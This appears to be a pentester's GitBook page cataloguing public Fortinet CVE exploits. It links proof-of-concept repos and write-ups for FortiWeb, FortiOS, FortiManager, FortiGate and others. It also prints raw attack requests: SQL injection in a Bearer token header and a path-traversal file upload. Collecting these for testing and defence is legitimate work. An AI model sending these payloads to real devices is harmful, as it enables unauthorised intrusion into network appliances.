Fortinet

Fortinet Public Exploits - CVE

FortiClient VPN

FortiClient VPN Logging Blind Spot RevealedPentera

CVE-2025-25257 - Pre-Auth SQLi - FortiWeb

Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257)watchTowr Labs

GET /api/fabric/device/status HTTP/1.1
Host: 192.168.8.30
Authorization: Bearer AAAAAA'/**/or/**/sleep(5)--/**/-'

GET /api/fabric/device/status HTTP/1.1
Host: 192.168.8.30
Authorization: Bearer AAAAAA'or'1'='1

Detection

GitHub - watchtowrlabs/watchTowr-vs-FortiWeb-CVE-2025-25257 at labs.watchtowr.comGitHub

CVE-2025-32756 - RCE

• FortiCamera

• FortiMail

• FortiNDR

• FortiRecorder

• FortiVoice

CVE-2025-32756: Fortinet RCE Exploited in the WildHorizon3.ai

GitHub - kn0x0x/CVE-2025-32756-POC: Proof of Concept for CVE-2025-32756 - A critical stack-based buffer overflow vulnerability affecting multiple Fortinet products.GitHub

CVE-2024-55591 - FortiOS Authentication Bypass Vulnerable

GitHub - watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591GitHub

GitHub - sysirq/fortios-auth-bypass-poc-CVE-2024-55591GitHub

GitHub - watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591GitHub

Get FortiRekt, I Am The Super_Admin Now - Fortinet FortiOS Authentication Bypass CVE-2024-55591watchTowr Labs

CVE-2024-47575 - Fortimanager - Fortijump, Unauthenticated Remote Code Execution

GitHub - watchtowrlabs/Fortijump-Exploit-CVE-2024-47575: Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575GitHub

CVE-2024-23666 - FortiManager - Insufficient authorization checks

Fortimanager multiple vulnerabilitiesSynacktiv

CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection

GitHub - horizon3ai/CVE-2024-23108: CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command InjectionGitHub

CVE-2024-21762 - FortiGate RCE

GitHub - cleverg0d/CVE-2024-21762-Checker: This script performs vulnerability scanning for CVE-2024-21762, a Fortinet SSL VPN remote code execution vulnerability. It checks whether a given server is vulnerable to this CVE by sending specific requests and analyzing the responses.GitHub

GitHub - d0rb/CVE-2024-21762: The PoC demonstrates the potential for remote code execution by exploiting the identified security flaw.GitHub

Two Bytes is Plenty: FortiGate RCE with CVE-2024-21762

CVE-2023-48788 Fortinet FortiClient EMS SQL Injection Vulnerabilitiy

GitHub - horizon3ai/CVE-2023-48788: Fortinet FortiClient EMS SQL InjectionGitHub

CVE-2023-42791 - FortiManager - Unrestricted File Upload

Fortimanager multiple vulnerabilitiesSynacktiv

POST /flatui/api/gui/upload HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=---------------------------26433208534746453103032271192
Content-Length: 729
[...]

-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="folder"

upload
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filesize"

5
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filename"

../../../../../test.txt
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="range"

0-5
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filepath"; filename="system.dat"
Content-Type: application/octet-stream

test

-----------------------------26433208534746453103032271192--

CVE-2023-27997 - FortiGate SSL-VPN

GitHub - BishopFox/CVE-2023-27997-check: Safely detect whether a FortiGate SSL VPN instance is vulnerable to CVE-2023-27997 based on response timingGitHub

CVE-2022-40684 - Fortinet FortiOS, FortiProxy, and FortiSwitchManager

GitHub - horizon3ai/CVE-2022-40684: A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManagerGitHub

CVE-2022-39952 - Fortinet FortiNAC

GitHub - horizon3ai/CVE-2022-39952: POC for CVE-2022-39952GitHub

CVE-2021-26088 - Improper Authentication in Fortinet Fortinet Single Sign-On

GitHub - theogobinet/CVE-2021-26088: PoC for CVE-2021-26088 written in PowerShellGitHub

CVE-2018-13379 - FortiGate SSL-VPN

GitHub - anasbousselham/fortiscan: A high performance FortiGate SSL-VPN vulnerability scanning and exploitation tool.GitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.